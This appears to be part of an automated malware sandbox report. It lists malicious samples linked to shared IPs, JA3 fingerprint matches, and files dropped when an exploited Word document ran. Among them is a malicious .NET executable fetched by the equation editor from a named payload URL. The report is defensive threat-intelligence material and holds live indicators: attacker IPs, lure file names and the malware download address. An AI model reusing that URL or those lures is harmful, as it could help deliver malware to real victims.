                                                                          SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          Updated Invoice{swift..exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          mr kesh.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          SecuriteInfo.com.Artemis326CF1417127.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          Enq No 34 22-01-2021.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          BLACKNIGHT-ASIEspptqzbEyNlEJvj.exeGet hashmaliciousBrowse
                                                                          • 91.210.233.220
                                                                          Request a quote Mitsubishi Japan XN501.exeGet hashmaliciousBrowse
                                                                          • 81.17.241.117
                                                                          6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                                          • 81.17.241.117
                                                                          cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                          • 78.153.213.7
                                                                          4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                                                          • 78.153.213.7
                                                                          mb10.exeGet hashmaliciousBrowse
                                                                          • 78.153.210.4
                                                                          mb10.exeGet hashmaliciousBrowse
                                                                          • 78.153.210.4
                                                                          https://99756260.us17.list-manage.com/pages/track/click?u=ae9ce42233ecb67da0142e610&id=4eb4fb4732/#YXJtYW5kby5jaGF2ZXpAb3prLmNvbQ==Get hashmaliciousBrowse
                                                                          • 78.153.210.7
                                                                          emotet-1.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          Emotet_7406.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          Emotet_7406.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          emotet.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          Paypal.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          Paypal.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          emotet.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          emotet.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          960-27-621120-257 & 960-27-621120-969.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          Rechnung.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          Open invoices.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          Paid Invoices.docGet hashmaliciousBrowse
                                                                          • 46.22.132.72
                                                                          NAMECHEAP-NETUS#B30COPY.htmGet hashmaliciousBrowse
                                                                          • 198.54.115.249
                                                                          AE-808_RAJEN.exeGet hashmaliciousBrowse
                                                                          • 68.65.122.156
                                                                          RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          quote20210126.exe.exeGet hashmaliciousBrowse
                                                                          • 198.54.117.215
                                                                          MV TAN BINH 135.pdf.exeGet hashmaliciousBrowse
                                                                          • 198.54.116.236
                                                                          IMG_155710.docGet hashmaliciousBrowse
                                                                          • 199.192.18.134
                                                                          bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                                          • 198.54.117.215
                                                                          Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                          • 199.192.21.36
                                                                          Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                          • 199.192.21.36
                                                                          winlog(1).exeGet hashmaliciousBrowse
                                                                          • 198.54.117.216
                                                                          Revise Bank Details_pdf.exeGet hashmaliciousBrowse
                                                                          • 198.54.116.236
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exeGet hashmaliciousBrowse
                                                                          • 198.187.31.7
                                                                          SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                                          • 198.187.31.7
                                                                          Payment Swift Copy_USD 206,832,000.00.pdf.exeGet hashmaliciousBrowse
                                                                          • 198.54.116.236
                                                                          INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                          • 198.54.117.244
                                                                          DSksIiT85D.exeGet hashmaliciousBrowse
                                                                          • 199.188.200.97
                                                                          file.exeGet hashmaliciousBrowse
                                                                          • 198.54.116.236
                                                                          Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                                                                          • 104.219.248.112
                                                                          file.exeGet hashmaliciousBrowse
                                                                          • 198.54.116.236
                                                                          RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                                          • 198.54.117.215

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          7dcce5b76c8b17472d024758970a406bSecuriteInfo.com.Heur.3279.xlsmGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          Rolled Alloys Possible Infection.docxGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          Statement of Account as of Jan_27 2021.xlsmGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          printouts of outstanding as of Jan-27-2021.xlsmGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          printouts of outstanding as of Jan_27_2021.xlsmGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          FACTUUR-INV00012.xlsxGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          0007334.xlsxGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          Purchase Order.xlsxGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          SecuriteInfo.com.Heur.30497.xlsGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          case (2553).xlsGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          case (1057).xlsGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          case (4335).xlsGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          case (1522).xlsGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          case (4374).xlsGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          case (166).xlsGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          PAYMENT.xlsxGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          case (547).xlsGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          The Mental Health Center.xlsxGet hashmaliciousBrowse
                                                                          • 172.111.202.41
                                                                          Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                                                          • 172.111.202.41

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):59134
                                                                          Entropy (8bit):7.995450161616763
                                                                          Encrypted:true
                                                                          SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                          MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                          SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                          SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                          SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):893
                                                                          Entropy (8bit):7.366016576663508
                                                                          Encrypted:false
                                                                          SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                          MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                          SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                          SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                          SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):328
                                                                          Entropy (8bit):3.084754685484955
                                                                          Encrypted:false
                                                                          SSDEEP:6:kKShbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:d3kPlE99SNxAhUeo+aKt
                                                                          MD5:9DC602D7EFBD074139D720C06ABBEBD6
                                                                          SHA1:23C1D7932B5B1F1CE310BB2D59A770326B8DE00C
                                                                          SHA-256:79DF9722F69E0F143AE2CB36E36185F77203BC9D303079D452F2F0291FC16935
                                                                          SHA-512:E378A50B26D00C389470D80A97C453F4562F05D217907912B0A32F7A34B42EF8A69D5423D6EA0209723B3BC7C4DEF01DC0C51BFEC6B61A99F8836DC077259E70
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: p...... ..........K#...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):252
                                                                          Entropy (8bit):3.0294634724686764
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFkl3JQwfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKKBliBAIdQZV7eAYLit
                                                                          MD5:D4B897E42440BA3B7AD774EF7B18BFE7
                                                                          SHA1:313CAA53DC087A1EFC3150CD1D6522D3FFFEB563
                                                                          SHA-256:9E04BF873C73D7CD0F9B7C83D5A328BF128CB6290DCDC2D06DA2887C2B93A70D
                                                                          SHA-512:187A80B13EC931B3E4686DA4D0D55114EC60219679FE086E8E299B2D629E9722A946488D34E99A72C8569DB7CB97D3322217E4D42F09C45E26B27A273F984B65
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: p...... ....`.....qK#...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mexxxx[1].exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:downloaded
                                                                          Size (bytes):76288
                                                                          Entropy (8bit):5.615424298105816
                                                                          Encrypted:false
                                                                          SSDEEP:768:MTzDjFC9bGg0QNpcnRzFE86hFZNj3KTMmtBI0vdr/M7da5QI+edjVdsv2PYMOOgU:4JCtGg0oqvdY7dJE4ZqkonOaWYT
                                                                          MD5:F82A16AC433034D92B1F2A4023DF6D6B
                                                                          SHA1:3035958ACDC4B66F86D14B8A9EE6D637A0654659
                                                                          SHA-256:967C4B786047C2EA5BFB42C5FA315A5971C4C8A9590973AC49698C78A6B95D1C
                                                                          SHA-512:B86526051EB7A22FC99C5AAC2EDDDD4B90984FF010E527A27D47A627AE7E3FEF72384D86790974ABE7CF86C0682C5C98D90FCC43807F8A3E11B6B6F19306A5F5
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          IE Cache URL:https://cy.kl-re.com//power/nez/mexxxx.exe
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.........."...0.............n:... ...@....@.. ...............................k....`..................................:..O....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................P:......H........F..\...................P .......................................................................................................................................................................*.r...p(I........sJ........r...p.....sK........*.r...p......%.r...p.%.r'..p.%.r...p.(m...*.r...p......%.r...p.%.r/..p.%.r'..p.%.r...p.(m...*.r...p......%.r3..p.%.rO..p.%.r3..p.%.rC..p.(m...*. ....*.~....%:....&.l...(....sr...%.....*2r...p.(G...*2r...p.(G...*2r4..p.(G...*2rf..p.(
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4385F6C0-FFD8-4816-B513-C2DC6937B540}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1024
                                                                          Entropy (8bit):0.05390218305374581
                                                                          Encrypted:false
                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9312A5BA-14BB-458B-BB2D-5B313121AE89}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1024
                                                                          Entropy (8bit):1.2587732907904714
                                                                          Encrypted:false
                                                                          SSDEEP:6:zX65UlR535UlR5YlXNgREqAWlgFJGD//jlll8vlw2FrA:7KUtpUtYvk5uFJUXbuvq2ZA
                                                                          MD5:2B81F22D0E280F756279A381711B528B
                                                                          SHA1:7C9753841930CB5F4124B9292BA7C5D0975A25E8
                                                                          SHA-256:20240773E769371152D2B7571005A81F3DB2C3BE5EC3E01EF55C57E670F7EC9B
                                                                          SHA-512:8F7E6A42D080D5C50F07FA2D1043757D5FD38C6A956B437F5BA5E3A1D1291F888A7377E6C2947E2487586E607836DEAC7C803B71ECA703072168C89C44F292F4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: . . . . . . . . . . . . . . . . . . .5.2.1.2.2.8.3.4._.1.0.5.9.2.3.0.3.2.4.1.0.5.9.2.3.0.3.2.4. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._.1.0.5.9.2.3.0.3.2.4.1.0.5.9.2.3.0.3.2.4.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
                                                                          C:\Users\user\AppData\Local\Temp\Cab738B.tmp
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):59134
                                                                          Entropy (8bit):7.995450161616763
                                                                          Encrypted:true
                                                                          SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                          MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                          SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                          SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                          SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                          C:\Users\user\AppData\Local\Temp\Tar738C.tmp
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):152788
                                                                          Entropy (8bit):6.316654432555028
                                                                          Encrypted:false
                                                                          SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                          MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                          SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                          SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                          SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documenting.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jan 28 02:05:36 2021, length=362048, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2038
                                                                          Entropy (8bit):4.572720325140115
                                                                          Encrypted:false
                                                                          SSDEEP:48:8Xk/XT0jFk5EN61lQh2Xk/XT0jFk5EN61lQ/:8Xk/XojFkZlQh2Xk/XojFkZlQ/
                                                                          MD5:B134E360172F13F49370E63413A8FA6D
                                                                          SHA1:7D6EDBABA867C1A58DE653601BD1433F94496A70
                                                                          SHA-256:1B88A78292C14F057E304A98C0D176ABB326AD85B014B708F02B01527B827241
                                                                          SHA-512:0570B003346C539654E5E18A246E0451074EE2E0934F36B0552F94ADDB34E6E733F627F8088968B4FD9FC2D094C0A812EDC8300EE1AEABAB424AB3D73F218A66
                                                                          Malicious:false
                                                                          Preview: L..................F.... ...K2.{..K2.{.....s"...@............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.@...<R.. .DOCUME~1.DOC..L.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.i.n.g...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\documenting.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.i.n.g...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):71
                                                                          Entropy (8bit):4.253738282850138
                                                                          Encrypted:false
                                                                          SSDEEP:3:M18H9LRZLUlZELRZLUlmX18H9LRZLUlv:M+H9LQLELQxH9LQ1
                                                                          MD5:0B35B2D87B6FB009A3B79BF6ABFFDBA3
                                                                          SHA1:8719655B472C613B935F415D02D45333EF03FC94
                                                                          SHA-256:FFD54C3CEA36F1BA5E8A845BBC796D38CE6B437FC42335EE8EECD648E4DB6BC8
                                                                          SHA-512:B0C85F193C0DBBE83F7D77E555555FFC2B6C801E7D9A65D2F84874F444CA949C45CEA009793A1466C9D9ADC58753C4E25C2E43D33F87BD8A3FA4105A96289EC1
                                                                          Malicious:false
                                                                          Preview: [doc]..documenting.LNK=0..documenting.LNK=0..[doc]..documenting.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.431160061181642
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                          MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                          SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                          SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                          SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):2
                                                                          Entropy (8bit):1.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Qn:Qn
                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                          Malicious:false
                                                                          Preview: ..
                                                                          C:\Users\user\AppData\Roaming\RegAskcfcd.exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):76288
                                                                          Entropy (8bit):5.615424298105816
                                                                          Encrypted:false
                                                                          SSDEEP:768:MTzDjFC9bGg0QNpcnRzFE86hFZNj3KTMmtBI0vdr/M7da5QI+edjVdsv2PYMOOgU:4JCtGg0oqvdY7dJE4ZqkonOaWYT
                                                                          MD5:F82A16AC433034D92B1F2A4023DF6D6B
                                                                          SHA1:3035958ACDC4B66F86D14B8A9EE6D637A0654659
                                                                          SHA-256:967C4B786047C2EA5BFB42C5FA315A5971C4C8A9590973AC49698C78A6B95D1C
                                                                          SHA-512:B86526051EB7A22FC99C5AAC2EDDDD4B90984FF010E527A27D47A627AE7E3FEF72384D86790974ABE7CF86C0682C5C98D90FCC43807F8A3E11B6B6F19306A5F5
                                                                          Malicious:true
